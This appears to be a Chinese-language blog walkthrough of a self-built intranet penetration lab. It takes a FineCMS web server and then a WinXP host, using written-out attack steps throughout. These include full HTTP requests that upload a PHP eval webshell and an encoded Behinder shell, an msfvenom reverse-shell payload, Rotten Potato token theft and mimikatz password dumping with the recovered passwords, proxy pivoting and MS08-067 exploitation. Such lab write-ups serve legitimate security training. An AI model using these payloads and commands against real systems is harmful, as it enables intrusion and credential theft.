IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> 自建靶场2022 -> 正文阅读

[PHP知识库]自建靶场2022

目录

一、靶场介绍

二、拿下web服务器

2.1 任意文件上传拿shell

2.2 反弹meterpreter

2.3 提权

2.4 抓取hash

三、内网渗透

3.1信息收集

3.2 配置代理

3.3 nmap扫描端口

3.4 漏洞利用

3.5 远程登录

四、补充:提权

4.1 本地提权

4.2 远程提权


一、靶场介绍

本靶场是一个简单的内网渗透靶场。需要首先拿到win2008服务器的权限,再渗透内网拿下WinXP,win2008上没有flag,flag在WinXP上。综合考验许多知识,暂未使用防护软件,属于一个比较基础的靶场。

主要配置如下:

系统

ip地址

kali 2020

192.168.1.106

win10 (本机)

192.168.1.104

win2008

192.168.1.107

winxp

10.101.10.133

靶场链接如下:

链接:https://pan.baidu.com/s/14WRh6C8Fdpk5hfmZ9ar8Uw

提取码:ehs8

ps:win10和kali自备

分享多了怕被封,所以目前是10名额,应该打靶场的人也不多。

二、拿下web服务器

2.1 任意文件上传拿shell

nmap 192.168.1.107 -p 8069 -sV

8069端口是web端口,访问 http://192.168.1.107:8069/ 发现是finecms。

百度搜索finecms漏洞

(15条消息) finecms前台任意文件上传——getshell_W小哥-CSDN博客_任意文件上传getshell

前台注册

首先上传一个正常的头像,找到路径

 <?php @eval($_POST['a']); ?>  # 一句胡木马base64加密
IDw/cGhwIEBldmFsKCRfUE9TVFsnYSddKTsgPz4=

构造数据包如下

POST /index.php?s=member&c=account&m=upload&iajax=1 HTTP/1.1
Host: 192.168.1.107:8069
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.107:8069/index.php?s=member&c=account&m=avatar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9393
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=3t2cf0ogg6kuvah0r0mjc4l35a08hv57; member_uid=4; member_cookie=be39236988f55e17096d


tx=data%3Aimage%2Fphp%3Bbase64%2CIDw/cGhwIEBldmFsKCRfUE9TVFsnYSddKTsgPz4=

上面这个就使用中国菜刀或者中华蚁剑连接就可以了。

这里我使用了冰蝎。base64加密就是冰蝎的马。

POST /index.php?s=member&c=account&m=upload&iajax=1 HTTP/1.1
Host: 192.168.1.107:8069
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.107:8069/index.php?s=member&c=account&m=avatar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9393
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=3t2cf0ogg6kuvah0r0mjc4l35a08hv57; member_uid=4; member_cookie=be39236988f55e17096d


tx=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IAoJJF9TRVNTSU9OWydrJ109JGtleTsKCSRwb3N0PWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkKCXsKCQkkdD0iYmFzZTY0XyIuImRlY29kZSI7CgkJJHBvc3Q9JHQoJHBvc3QuIiIpOwoJCQoJCWZvcigkaT0wOyRpPHN0cmxlbigkcG9zdCk7JGkrKykgewogICAgCQkJICRwb3N0WyRpXSA9ICRwb3N0WyRpXV4ka2V5WyRpKzEmMTVdOyAKICAgIAkJCX0KCX0KCWVsc2UKCXsKCQkkcG9zdD1vcGVuc3NsX2RlY3J5cHQoJHBvc3QsICJBRVMxMjgiLCAka2V5KTsKCX0KICAgICRhcnI9ZXhwbG9kZSgnfCcsJHBvc3QpOwogICAgJGZ1bmM9JGFyclswXTsKICAgICRwYXJhbXM9JGFyclsxXTsKCWNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIF9faW52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgIEBjYWxsX3VzZXJfZnVuYyhuZXcgQygpLCRwYXJhbXMpOwo/Pg==%3D

这里可以上传msf生成的exe。

msfvenom -p  windows/meterpreter/reverse_tcp  lhost=192.168.1.106 lport=4444 -f exe -o web.exe

但是我们都使用冰蝎了,直接反弹shell。

2.2 反弹meterpreter

使用冰蝎反弹meterpreter

2.3 提权

migrate pid  #迁移进程提权
post/multi/recon/local_exploit_suggester #msf找寻提权方案
post/windows/gather/enum_patches  
#找补丁然后使用提权网页
http://bugs.hacking8.com/tiquan/? #提权辅助网页

使用烂土豆配合msf提权

execute -HC -f rottenpotato.exe  #静默执行烂土豆 生成system权限的令牌
use incognito              #使用incognito模块
list_tokens -u              #列出所有令牌
impersonate_token "NT AUTHORITY\\SYSTEM"  #窃取令牌

2.4 抓取hash

这里使用msf自带的mimikatz和hashdump出问题,所以上传了一个github下载的mimikatz

使用下面的命令获得明文密码。

cd C:\Users\Administrator\Desktop
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > password.txt

账号

密码

administrator

hacker1961

三、内网渗透

3.1信息收集

通过ipconfig 和arp_scanner探测内网ip

内网网段为10.101.10.0/24

发现内网主机10.101.10.133

run autoroute -s 10.101.10.0/24  添加路由
run autoroute -p   确认添加路由

3.2 配置代理

use auxiliary/server/socks_proxy 
这里要注意的点是版本为4a
set version 4a
run
vim /etc/proxychains.conf 编辑proxychain的配置文件

3.3 nmap扫描端口

proxychains nmap -Pn -sT 10.101.10.133 -p 80,89,8000,9090,1433,1521,3306,5432,445,135,443,873,5984 ,6379,7001,7002,9200, 9300 ,11211,27017,27018,50000,50070,50030,21,22,23,2601,3389 --open

3.4 漏洞利用

80端口啥也没有,看到445端口可以打一下。

use auxiliary/scanner/smb/smb_version #扫描smb版本
search ms08_067 搜索08067漏洞,非常经典的漏洞
set rhost 10.101.10.133
run

smb判断是winxp sp3 所以使用ms08_067打一下。

这里就不需要提权了,已经是system权限。

获得flag C:\Documents and Settings\Administrator\Desktop

cd C:\Documents and Settings\Administrator\Desktop
type flag.txt

flag{aGFwcHkgbmV3IHllYXIh}

flag解密得到

echo "aGFwcHkgbmV3IHllYXIh" | base64 -d

3.5 远程登录

获取hash

或者使用msf自带的mimikatz

load kiwi  加载mimikatz
creds_all  抓取密码

账号

密码

administrator

123456

然后3389登录

proxychains rdesktop 10.101.10.133

四、补充:提权

这里作者在打靶场的时候顺便整理了一些浅显的提权知识。

4.1 本地提权

NSudoLC提权

#项目说明
https://nsudo.m2team.org/zh-hans/
#项目地址
https:://github.com/Thdub/NSudo_Installer

使用工具中的x64的NSudoLC.exe,NSudoLG.exe为图形化界面,可以本地提权最新版win10.

NSudoLC.exe -U:S -P:E web.exe

这里需要有管理员的权限,可以提升到system权限

BitsArbitraryFileMoveExploit.exe提权

这个是2020年8月出的一个bendi提权漏洞,影响版本非常多,包括当时最新的win10 算是一个比较近的提权漏洞。但是只能双击执行,会弹出一个system权限的窗口。

4.2 远程提权

本文2.3中的烂土豆结合msf提权,这里换一种方式提权。

上传cve-2019-1458.exe

然后执行cve-2019-1458.exe web.exe

反弹回来system权限的meterpreter

提权可分为几类:

  1. 利用系统漏洞提权 (分为本地提权和远程提权)

  2. 迁移进程提权 (msf的migrate)

  3. bypassuac提权 (msf集成模块)

  4. 窃取令牌提权 (烂土豆)

  5. 利用数据库提权 (利用数据库的root权限,可以获得最高权限)

本文使用到的链接:

Kernelhub/CVE-2020-0787 at master · iNarcissuss/Kernelhub · GitHub

Kernelhub/cve-2019-1458.exe at master · Ascotbe/Kernelhub · GitHub

本文作者:

sm

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-02-14 20:53:46  更:2022-02-14 20:54:21 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/27 6:06:25-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计